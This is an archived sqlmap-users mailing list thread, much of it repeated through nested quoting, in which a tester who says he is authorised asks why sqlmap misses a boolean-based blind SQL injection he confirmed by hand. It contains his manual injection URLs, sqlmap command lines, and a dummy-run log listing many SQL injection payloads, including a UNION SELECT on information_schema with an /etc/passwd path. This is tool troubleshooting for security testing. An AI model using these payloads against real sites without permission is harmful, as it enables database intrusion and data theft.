> >> > Alistair, have you tried --risk=3 with --level=5 yet?
> >> >
> >> > Sent from a phone
> >> >
> >> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar
> >> > <mir...@gm...>
> >> > wrote:
> >> >
> >> > Can you please send the unredacted content of request.txt to my
> address?
> >> >
> >> > If not, then please at least send me the content of traffic file which
> >> > you
> >> > can obtain by just appending the "-t traffic.txt" to the regular
> >> > sqlmap's
> >> > run.
> >> >
> >> > Bye
> >> >
> >> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson
> >> > <amc...@gm...>
> >> > wrote:
> >> >>
> >> >> Thanks for the quick reply.
> >> >>
> >> >> The contents of the request file are as follows:
> >> >>
> >> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> >> >> Host: <redacted>
> >> >> Accept: */*
> >> >> Accept-Language: en
> >> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
> >> >> x64; Trident/5.0)
> >> >> Connection: close
> >> >> Referer: <redacted>
> >> >> Cookie: <redacted>
> >> >>
> >> >> I've redacted some of the details as it's not appropriate to draw
> >> >> attention to an internet facing application's SQLi vulnerability.
> >> >>
> >> >> When providing the request file as part of the following command:
> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> 'industries' -v 1
> >> >>
> >> >> sqlmap executes as normal but cannot identify (and therefore cannot
> >> >> exploit) the boolean-based blind vulnerability which I've verified
> >> >> manually.
> >> >>
> >> >> Thanks again,
> >> >>
> >> >> Al.
> >> >>
> >> >>
> >> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
> >> >> <mir...@gm...> wrote:
> >> >> > And what is the content of request file?
> >> >> >
> >> >> > Bye
> >> >> >
> >> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
> >> >> > <amc...@gm...>
> >> >> > wrote:
> >> >> >>
> >> >> >> Hi sqlmappers,
> >> >> >>
> >> >> >> I'm a fairly experienced user of sqlmap having used it extensively
> >> >> >> in
> >> >> >> the past. I came across what appeared to pretty typical
> >> >> >> boolean-based
> >> >> >> blind SQLi in an application I'm (legally) testing. However, for
> the
> >> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> >> >> vulnerable to exploit it further. And as we know, manually
> >> >> >> exploiting
> >> >> >> blind SQLi is cumbersome to say the least.
> >> >> >>
> >> >> >> Here is a summary of the requests i've made to manually confirm
> the
> >> >> >> vulnerability.
> >> >> >>
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
> >> >> >> response
> >> >> >> A)
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
> >> >> >> response
> >> >> >> B)
> >> >> >>
> >> >> >> I've tried various sqlmap flags and thought the following command
> >> >> >> would give me the best chance of success:
> >> >> >>
> >> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> >> 'industries' -v 1
> >> >> >>
> >> >> >> Note: the string 'industries' is text that appears in response A
> but
> >> >> >> not response B.
> >> >> >>
> >> >> >> I've looked at the requests that sqlmap is sending in the
> background
> >> >> >> (proxied through burp). It appears that it's attempting to exploit
> >> >> >> this with the AND statement as it should but is not using single
> >> >> >> quotes as per my example above.
> >> >> >>
> >> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap,
> i'd
> >> >> >> be
> >> >> >> more than happy to contribute some time to improve it so it can
> >> >> >> identify injectable parameters such as these in the future.
> >> >> >>
> >> >> >> Thanks,
> >> >> >>
> >> >> >> Al.
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >>
> ------------------------------------------------------------------------------
> >> >> >> One dashboard for servers and applications across
> >> >> >> Physical-Virtual-Cloud
> >> >> >> Widest out-of-the-box monitoring support with 50+ applications
> >> >> >> Performance metrics, stats and reports that give you Actionable
> >> >> >> Insights
> >> >> >> Deep dive visibility with transaction tracing using APM Insight.
> >> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >> >> >> _______________________________________________
> >> >> >> sqlmap-users mailing list
> >> >> >> sql...@li...
> >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >> >
> >> >> >
> >> >> >
> >> >> >
> >> >> > --
> >> >> > Miroslav Stampar
> >> >> > http://about.me/stamparm
> >> >
> >> >
> >> >
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >> >
> >> >
> >> >
> ------------------------------------------------------------------------------
> >> > One dashboard for servers and applications across
> Physical-Virtual-Cloud
> >> > Widest out-of-the-box monitoring support with 50+ applications
> >> > Performance metrics, stats and reports that give you Actionable
> Insights
> >> > Deep dive visibility with transaction tracing using APM Insight.
> >> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >> >
> >> > _______________________________________________
> >> > sqlmap-users mailing list
> >> > sql...@li...
> >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> One dashboard for servers and applications across Physical-Virtual-Cloud
> Widest out-of-the-box monitoring support with 50+ applications
> Performance metrics, stats and reports that give you Actionable Insights
> Deep dive visibility with transaction tracing using APM Insight.
> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Alistair J. <amc...@gm...>]

OK. You're right in that the following lines in your dummy output
should produce discernable responses when tested against the
application:
PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd

I've verified this manually. Thanks and I'll send you the traffic output file.

Cheers,

Alistair.

On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar
<mir...@gm...> wrote:
> I would say that you screwed something up. Can you please send that traffic
> file I requested.
>
> Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
> AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
> invalid.
>
> $ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection
> --dummy -v 3
>          _
>  ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability and
> are not responsible for any misuse or damage caused by this program
>
> [*] starting at 08:55:05
>
> [08:55:05] [DEBUG] cleaning up configuration parameters
> [08:55:05] [DEBUG] setting the HTTP timeout
> [08:55:05] [DEBUG] creating HTTP requests opener object
> [08:55:05] [DEBUG] heuristically checking if the target is protected by some
> kind of WAF/IPS/IDS
> [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
> FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
> [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
> [08:55:05] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
> comparison on a sequence matcher. If no dynamic nor injectable parameters
> are detected, or in case of junk results, refer to user's manual paragraph
> 'Page comparison' and provide a string or regular expression to match on
> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
> [08:55:08] [INFO] searching for dynamic content
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
> [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
> retry the request
> [08:55:08] [INFO] searching for dynamic content
> [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] 2485
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
> [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] 8682
> [08:55:08] [INFO] GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
> [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec'
> might not be injectable
> [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
> [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
> [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
> [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
> [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
> [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
> [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
> [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
> [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
> [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
> [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
> [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
> [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
> [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
> [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
> ...
>
> On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amc...@gm...>
> wrote:
>>
>> Hi Brandon,
>>
>> Thanks for your comment. Confirming that i've tried risk=3 with
>> level=5 with the same results. I've looked more closely at the
>> requests that sqlmap is sending to check if the parameter is
>> injectable. It is testing the Sec paramater with values such as:
>>
>> PackageSelection) AND 1477=7114
>> PackageSelection) AND 1631=1631
>> PackageSelection') AND 5603=7729
>> PackageSelection') AND 1631=1631
>> PackageSelection' AND 3943=9381
>> PackageSelection' AND 1631=1631
>> PackageSelection" AND 3324=4690
>> PackageSelection" AND 1631=1631
>> PackageSelection) AND 4734=6616 AND (6346=6346
>> PackageSelection)) AND 7350=9272 AND (8861=8861
>>
>> When in fact, i assume it would need to use logic like I used to get
>> distinguishable responses:
>>
>> PackageSelection (returns response A)
>> PackageSelection' AND '1'='1 (returns response A)
>> PackageSelection' AND '1'='2 (returns response B)
>>
>> In a nutshell, it doesn't appear to be trying single quotes and values
>> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
>> typical format for checking boolean-based blind SQLi.
>>
>> Cheers,
>>
>> Alistair.
>>
>> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
>> <bpe...@gm...> wrote:
>> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
>> >
>> > Alistair, have you tried --risk=3 with --level=5 yet?
>> >
>> > Sent from a phone
>> >
>> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar
>> > <mir...@gm...>
>> > wrote:
>> >
>> > Can you please send the unredacted content of request.txt to my address?
>> >
>> > If not, then please at least send me the content of traffic file which
>> > you
>> > can obtain by just appending the "-t traffic.txt" to the regular
>> > sqlmap's
>> > run.
>> >
>> > Bye
>> >
>> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson
>> > <amc...@gm...>
>> > wrote:
>> >>
>> >> Thanks for the quick reply.
>> >>
>> >> The contents of the request file are as follows:
>> >>
>> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>> >> Host: <redacted>
>> >> Accept: */*
>> >> Accept-Language: en
>> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
>> >> x64; Trident/5.0)
>> >> Connection: close
>> >> Referer: <redacted>
>> >> Cookie: <redacted>
>> >>
>> >> I've redacted some of the details as it's not appropriate to draw
>> >> attention to an internet facing application's SQLi vulnerability.
>> >>
>> >> When providing the request file as part of the following command:
>> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> 'industries' -v 1
>> >>
>> >> sqlmap executes as normal but cannot identify (and therefore cannot
>> >> exploit) the boolean-based blind vulnerability which I've verified
>> >> manually.
>> >>
>> >> Thanks again,
>> >>
>> >> Al.
>> >>
>> >>
>> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
>> >> <mir...@gm...> wrote:
>> >> > And what is the content of request file?
>> >> >
>> >> > Bye
>> >> >
>> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
>> >> > <amc...@gm...>
>> >> > wrote:
>> >> >>
>> >> >> Hi sqlmappers,
>> >> >>
>> >> >> I'm a fairly experienced user of sqlmap having used it extensively
>> >> >> in
>> >> >> the past. I came across what appeared to pretty typical
>> >> >> boolean-based
>> >> >> blind SQLi in an application I'm (legally) testing. However, for the
>> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
>> >> >> vulnerable to exploit it further. And as we know, manually
>> >> >> exploiting
>> >> >> blind SQLi is cumbersome to say the least.
>> >> >>
>> >> >> Here is a summary of the requests i've made to manually confirm the
>> >> >> vulnerability.
>> >> >>
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
>> >> >> response
>> >> >> A)
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
>> >> >> response
>> >> >> B)
>> >> >>
>> >> >> I've tried various sqlmap flags and thought the following command
>> >> >> would give me the best chance of success:
>> >> >>
>> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> >> 'industries' -v 1
>> >> >>
>> >> >> Note: the string 'industries' is text that appears in response A but
>> >> >> not response B.
>> >> >>
>> >> >> I've looked at the requests that sqlmap is sending in the background
>> >> >> (proxied through burp). It appears that it's attempting to exploit
>> >> >> this with the AND statement as it should but is not using single
>> >> >> quotes as per my example above.
>> >> >>
>> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd
>> >> >> be
>> >> >> more than happy to contribute some time to improve it so it can
>> >> >> identify injectable parameters such as these in the future.
>> >> >>
>> >> >> Thanks,
>> >> >>
>> >> >> Al.
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >> ------------------------------------------------------------------------------
>> >> >> One dashboard for servers and applications across
>> >> >> Physical-Virtual-Cloud
>> >> >> Widest out-of-the-box monitoring support with 50+ applications
>> >> >> Performance metrics, stats and reports that give you Actionable
>> >> >> Insights
>> >> >> Deep dive visibility with transaction tracing using APM Insight.
>> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >> >> _______________________________________________
>> >> >> sqlmap-users mailing list
>> >> >> sql...@li...
>> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >> >
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > Miroslav Stampar
>> >> > http://about.me/stamparm
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>> >
>> >
>> > ------------------------------------------------------------------------------
>> > One dashboard for servers and applications across Physical-Virtual-Cloud
>> > Widest out-of-the-box monitoring support with 50+ applications
>> > Performance metrics, stats and reports that give you Actionable Insights
>> > Deep dive visibility with transaction tracing using APM Insight.
>> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Miroslav S. <mir...@gm...>]

I would say that you screwed something up. Can you please send that traffic
file I requested.

Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
invalid.

$ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection
--dummy -v 3
         _
 ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 08:55:05

[08:55:05] [DEBUG] cleaning up configuration parameters
[08:55:05] [DEBUG] setting the HTTP timeout
[08:55:05] [DEBUG] creating HTTP requests opener object
[08:55:05] [DEBUG] heuristically checking if the target is protected by
some kind of WAF/IPS/IDS
[08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
[08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
[08:55:05] [INFO] testing if the target URL is stable. This can take a
couple of seconds
[08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
comparison on a sequence matcher. If no dynamic nor injectable parameters
are detected, or in case of junk results, refer to user's manual paragraph
'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[08:55:08] [INFO] searching for dynamic content
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
[08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
retry the request
[08:55:08] [INFO] searching for dynamic content
[08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] 2485
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
[08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] 8682
[08:55:08] [INFO] GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
[08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec'
might not be injectable
[08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
[08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
[08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
[08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
[08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
[08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
[08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
[08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
[08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
[08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
[08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
[08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
[08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
[08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
[08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
[08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
[08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
...

On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amc...@gm...>
wrote:

> Hi Brandon,
>
> Thanks for your comment. Confirming that i've tried risk=3 with
> level=5 with the same results. I've looked more closely at the
> requests that sqlmap is sending to check if the parameter is
> injectable. It is testing the Sec paramater with values such as:
>
> PackageSelection) AND 1477=7114
> PackageSelection) AND 1631=1631
> PackageSelection') AND 5603=7729
> PackageSelection') AND 1631=1631
> PackageSelection' AND 3943=9381
> PackageSelection' AND 1631=1631
> PackageSelection" AND 3324=4690
> PackageSelection" AND 1631=1631
> PackageSelection) AND 4734=6616 AND (6346=6346
> PackageSelection)) AND 7350=9272 AND (8861=8861
>
> When in fact, i assume it would need to use logic like I used to get
> distinguishable responses:
>
> PackageSelection (returns response A)
> PackageSelection' AND '1'='1 (returns response A)
> PackageSelection' AND '1'='2 (returns response B)
>
> In a nutshell, it doesn't appear to be trying single quotes and values
> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
> typical format for checking boolean-based blind SQLi.
>
> Cheers,
>
> Alistair.
>
> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
> <bpe...@gm...> wrote:
> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
> >
> > Alistair, have you tried --risk=3 with --level=5 yet?
> >
> > Sent from a phone
> >
> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <
> mir...@gm...>
> > wrote:
> >
> > Can you please send the unredacted content of request.txt to my address?
> >
> > If not, then please at least send me the content of traffic file which
> you
> > can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
> > run.
> >
> > Bye
> >
> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...
> >
> > wrote:
> >>
> >> Thanks for the quick reply.
> >>
> >> The contents of the request file are as follows:
> >>
> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> >> Host: <redacted>
> >> Accept: */*
> >> Accept-Language: en
> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
> >> x64; Trident/5.0)
> >> Connection: close
> >> Referer: <redacted>
> >> Cookie: <redacted>
> >>
> >> I've redacted some of the details as it's not appropriate to draw
> >> attention to an internet facing application's SQLi vulnerability.
> >>
> >> When providing the request file as part of the following command:
> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> 'industries' -v 1
> >>
> >> sqlmap executes as normal but cannot identify (and therefore cannot
> >> exploit) the boolean-based blind vulnerability which I've verified
> >> manually.
> >>
> >> Thanks again,
> >>
> >> Al.
> >>
> >>
> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
> >> <mir...@gm...> wrote:
> >> > And what is the content of request file?
> >> >
> >> > Bye
> >> >
> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
> >> > <amc...@gm...>
> >> > wrote:
> >> >>
> >> >> Hi sqlmappers,
> >> >>
> >> >> I'm a fairly experienced user of sqlmap having used it extensively in
> >> >> the past. I came across what appeared to pretty typical boolean-based
> >> >> blind SQLi in an application I'm (legally) testing. However, for the
> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> >> vulnerable to exploit it further. And as we know, manually exploiting
> >> >> blind SQLi is cumbersome to say the least.
> >> >>
> >> >> Here is a summary of the requests i've made to manually confirm the
> >> >> vulnerability.
> >> >>
> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
> response
> >> >> A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
> response
> >> >> B)
> >> >>
> >> >> I've tried various sqlmap flags and thought the following command
> >> >> would give me the best chance of success:
> >> >>
> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> 'industries' -v 1
> >> >>
> >> >> Note: the string 'industries' is text that appears in response A but
> >> >> not response B.
> >> >>
> >> >> I've looked at the requests that sqlmap is sending in the background
> >> >> (proxied through burp). It appears that it's attempting to exploit
> >> >> this with the AND statement as it should but is not using single
> >> >> quotes as per my example above.
> >> >>
> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd
> be
> >> >> more than happy to contribute some time to improve it so it can
> >> >> identify injectable parameters such as these in the future.
> >> >>
> >> >> Thanks,
> >> >>
> >> >> Al.
> >> >>
> >> >>
> >> >>
> >> >>
> ------------------------------------------------------------------------------
> >> >> One dashboard for servers and applications across
> >> >> Physical-Virtual-Cloud
> >> >> Widest out-of-the-box monitoring support with 50+ applications
> >> >> Performance metrics, stats and reports that give you Actionable
> >> >> Insights
> >> >> Deep dive visibility with transaction tracing using APM Insight.
> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >> >> _______________________________________________
> >> >> sqlmap-users mailing list
> >> >> sql...@li...
> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >
> >> >
> >> >
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
> ------------------------------------------------------------------------------
> > One dashboard for servers and applications across Physical-Virtual-Cloud
> > Widest out-of-the-box monitoring support with 50+ applications
> > Performance metrics, stats and reports that give you Actionable Insights
> > Deep dive visibility with transaction tracing using APM Insight.
> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Brandon P. <bpe...@gm...>]

Also, when testing, ensure a space is following the comment directly,
otherwise the comment syntax will be malformed. You are testing against a
mssql db, so I think the valid comment syntax will be --<space>

On Tue, Apr 28, 2015 at 9:07 AM, Brandon Perry <bpe...@gm...>
wrote:

> Technically, it shouldn't*
>
> On Tue, Apr 28, 2015 at 9:07 AM, Brandon Perry <bpe...@gm...>
> wrote:
>
>> The injections I see like those are all suffixed with the start of a
>> comment (# or --). So, technically it should matter if single quotes are
>> used in the latter part of the boolean clause.
>>
>> For instance, SELECT * FROM blah WHERE foo = 'fdsa' with value 'fdsa'
>> being injectable. Using fdsa' AND 1=1# would result with the trailing
>> single quote being part of the comment and ignored by MySQL.
>>
>> Can you exploit the injection by hand using 1=1# or 1=1--?
>>
>> On Tue, Apr 28, 2015 at 8:15 AM, Alistair Johnson <amc...@gm...>
>> wrote:
>>
>>> Hi Brandon,
>>>
>>> Thanks for your comment. Confirming that i've tried risk=3 with
>>> level=5 with the same results. I've looked more closely at the
>>> requests that sqlmap is sending to check if the parameter is
>>> injectable. It is testing the Sec paramater with values such as:
>>>
>>> PackageSelection) AND 1477=7114
>>> PackageSelection) AND 1631=1631
>>> PackageSelection') AND 5603=7729
>>> PackageSelection') AND 1631=1631
>>> PackageSelection' AND 3943=9381
>>> PackageSelection' AND 1631=1631
>>> PackageSelection" AND 3324=4690
>>> PackageSelection" AND 1631=1631
>>> PackageSelection) AND 4734=6616 AND (6346=6346
>>> PackageSelection)) AND 7350=9272 AND (8861=8861
>>>
>>> When in fact, i assume it would need to use logic like I used to get
>>> distinguishable responses:
>>>
>>> PackageSelection (returns response A)
>>> PackageSelection' AND '1'='1 (returns response A)
>>> PackageSelection' AND '1'='2 (returns response B)
>>>
>>> In a nutshell, it doesn't appear to be trying single quotes and values
>>> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
>>> typical format for checking boolean-based blind SQLi.
>>>
>>> Cheers,
>>>
>>> Alistair.
>>>
>>> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
>>> <bpe...@gm...> wrote:
>>> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
>>> >
>>> > Alistair, have you tried --risk=3 with --level=5 yet?
>>> >
>>> > Sent from a phone
>>> >
>>> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <
>>> mir...@gm...>
>>> > wrote:
>>> >
>>> > Can you please send the unredacted content of request.txt to my
>>> address?
>>> >
>>> > If not, then please at least send me the content of traffic file which
>>> you
>>> > can obtain by just appending the "-t traffic.txt" to the regular
>>> sqlmap's
>>> > run.
>>> >
>>> > Bye
>>> >
>>> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <
>>> amc...@gm...>
>>> > wrote:
>>> >>
>>> >> Thanks for the quick reply.
>>> >>
>>> >> The contents of the request file are as follows:
>>> >>
>>> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>>> >> Host: <redacted>
>>> >> Accept: */*
>>> >> Accept-Language: en
>>> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
>>> >> x64; Trident/5.0)
